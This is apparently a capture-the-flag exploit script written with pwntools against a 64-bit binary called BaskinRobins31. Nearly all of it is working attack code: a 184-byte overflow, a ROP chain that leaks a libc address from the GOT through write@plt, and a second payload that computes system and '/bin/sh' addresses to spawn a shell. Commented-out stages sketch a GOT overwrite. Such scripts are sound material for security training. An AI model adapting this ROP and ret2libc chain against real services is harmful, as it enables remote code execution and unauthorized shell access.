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Created February 4, 2018 00:56
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from pwn import *
from struct import *
#NX is on
#64-bit bin
#going to require us to ROP!
#there is 184 bytes between our input_buf and our saved EIP.
#p 0x7fffffffe458 - 0x7fffffffe3a0 = 184
#the helper function allows us to leak _i think_
#so what we want to do is leak memsets libc address from the GOT, then return into the PLT with the address of write.
#0000000000602038 R_X86_64_JUMP_SLOT memset@GLIBC_2.2.5
# r = process('./BaskinRobins31')
r = remote('', 3131)
# gdb.attach(r,'b *0x40097a')
# gdb.attach(r,'b *0x40087d')
#our gadget addresses!
#helper = 0x400876
helper = 0x40087a
write_plt = 0x4006d0
memset_got = 0x602038
memset_plt = 0x4006f0
strtoul_got = 0x602068
libc_start_main_got = 0x602048
read_plt = 0x400700
#write_yay = 0x0602078 section?
#write_yay = 0x601000
write_yay = 0x00601e20 #.jcr
##### Leak memeset libc with write@plt #####
buf = ""
buf += "A"*184#padding until EIP.
buf += p64(helper) #stdout flag for write
buf += p64(0x1) #our argument setup
buf += p64(libc_start_main_got) #address to read from
buf += p64(0x8) #number of bytes to write to stdout
buf += p64(write_plt) #return back into write@plt
buf += p64(0x4008a4) #goback.
# buf += p64(helper) #stdout flag for write
# buf += p64(0x1) #our argument setup
# buf += p64(strtoul_got) #address to read from
# buf += p64(0x8) #number of bytes to write to stdout
# buf += p64(write_plt) #return back into write@plt
#### s1 - overwrite memset GOT with read@plt #####
# buf += p64(helper)
# buf += p64(0x0)
# buf += p64(memset_got)
# buf += p64(0x8)
# buf += p64(read_plt) #ret to read@plt
# ##### s2 - read /bin/sh into _somewhere_ writeable using read@plt #####
# buf += p64(helper)
# buf += p64(0x0)
# buf += p64(write_yay)
# buf += p64(0x8)
# buf += p64(read_plt)
# ##### s3 - set RDI = /bin/sh and call our winwinwin #####
# buf += p64(helper)
# buf += p64(write_yay)
# buf += p64(0x0)
# buf += p64(0x0)
# buf += p64(memset_plt) #should be system!
r.sendline(buf) #leak our memeset addr from libc
libc_start_main_got_a = r.recvn(8)[-6:].ljust(8, '\x00')
libc_start_main_got_b = u64(libc_start_main_got_a)
libc_start_main_got_c = hex(libc_start_main_got_b) #this is our final memset address.
print("libc_start_main_got is @ " + libc_start_main_got_c)
# strtoul_a = r.recvn(8)[-6:].ljust(8, '\x00')
# strtoul_b = u64(strtoul_a)
# strtoul_c = hex(strtoul_b) #this is our final memset address.
# print("strtoul_c is @ " + strtoul_c)
libc_start_main_offset = 0x020740
system_offset = 0x045390
libc_base = libc_start_main_got_b - libc_start_main_offset
system_address = libc_start_main_got_b + 0x24c50
sh_address = libc_start_main_got_b + 0x16c5d7
print("libc_base is @ " + hex(libc_base))
print("system is @ " + hex(system_address))
print("binsh is @ " + hex(sh_address))
# print("strtoul is @ " + strtoul_got)
#### Now craft a fake stackframe and win. ####
bufx = ""
bufx += "A" * 184 #padding until EIP.
bufx += p64(helper)
bufx += p64(sh_address)
bufx += p64(0x1)
bufx += p64(0x1)
bufx += p64(system_address)
#send addr of system.
# print("providing system :D")
# r.send(p64(system_address))
# #send our /bin/sh
# print("providing /bin/sh")
# # r.send("/bin/sh")
# r.send(p64(sh_address))
#We now have our leak, lets calculate some offsets!
# readelf -s /lib/x86_64-linux-gnu/ | grep memset
# 67: 00000000000ac8b0 114 FUNC WEAK DEFAULT 13 wmemset@@GLIBC_2.2.5
# 779: 0000000000117c30 25 FUNC GLOBAL DEFAULT 13 __wmemset_chk@@GLIBC_2.4
# 846: 000000000008f1b0 65 IFUNC GLOBAL DEFAULT 13 memset@@GLIBC_2.2.5 <-- this one
# 1397: 0000000000116370 65 IFUNC GLOBAL DEFAULT 13 __memset_chk@@GLIBC_2.3.4
#readelf -s /lib/x86_64-linux-gnu/ | grep system
# 225: 0000000000138810 70 FUNC GLOBAL DEFAULT 13 svcerr_systemerr@@GLIBC_2.2.5
# 584: 0000000000045390 45 FUNC GLOBAL DEFAULT 13 __libc_system@@GLIBC_PRIVATE
# 1351: 0000000000045390 45 FUNC WEAK DEFAULT 13 system@@GLIBC_2.2.5
#subtracting the memset offset from our address _should_ give us the libc base address.
# memset_offset = 0x08f1b0
# system_offset = 0x045390
# libc_base = memset_b - memset_offset
# system_address = libc_base + system_offset - 0x90
# print("libc_base is @ " + hex(libc_base))
# print("system is @ " + hex(system_address))
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